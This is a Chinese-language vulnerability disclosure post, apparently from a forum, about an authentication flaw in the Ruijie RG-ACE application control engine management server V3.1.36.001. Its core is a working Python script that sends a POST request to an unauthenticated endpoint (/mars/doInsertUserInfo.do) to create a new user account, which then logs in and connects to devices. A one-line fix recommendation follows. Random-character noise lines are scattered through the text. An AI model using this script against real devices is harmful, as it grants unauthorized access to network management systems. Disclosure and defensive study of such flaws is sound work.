锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
0 M" U' Q# g& C  R
& A% u# O3 g+ l! O* x, h( T! B# C$ b
测试的具体版本是
产品名称: 锐捷应用控制引擎
, [2 A  C% h" ~: j% O) @0 z版本号: 3.1.36.001 TC
编译时间: 201104291730
3 i& T' J8 |1 f9 B* S$ k
$ Q+ z' k/ O0 w) ~
漏洞证明：



( G- |8 t  J' u
# t& s* ?' t4 G- ~1 c
; v& e9 |- J# I3 z% q# P
/ J. u5 O9 B  u# ?$ o: T; Z执行脚本
#! /usr/bin/env python
#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
, t$ D( g" s* A9 f& a. Himport urllib2, urllib,cookielib
8 l' z) d: ~: kurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
. Y0 J0 q3 l) O9 jopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
. X  J* L7 a8 lpost=(("event","userManager.doInsertUserInfo"),
( O6 e! O1 o: T  |("useractionname","addButtonValue"),
("useropermanager","userManager"),
("userName","t"), #######账号自己加
, V/ h7 ]- @1 Q0 T5 x- L+ ]6 T("pwd","aaaaaa"),######密码自己加
9 d: B4 S8 A( l5 ]% }  p("trueName","ad"),
("email",""),
2 `" X8 ]7 |  o9 K("mobilePhone",""),
/ G% k1 s+ |( r( r* J("officePhone",""),
("addr",""),
$ G: s/ Y: [" S("submit","确定"))
urllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
4 f  x2 L+ j. n4 m1 u' eprint "Done"

& Y: h, \+ [: E6 `0 R登录，连接设备

0 E) D  V) F# \* v% U7 M

1 s# K# V7 v& M
0 F' ?, ]3 U" z1 ?3 x+ y* n# c" F, q
默认的管理员admin权限更大点
/ \# b1 [- R8 _5 S2 t5 H

$ l7 t9 {- S2 T* ~

: k' O0 M9 E  e" _; I. L
' y! `% v& T: w7 T2 \- W% Z# }修复方案：
加强对接口的权限验证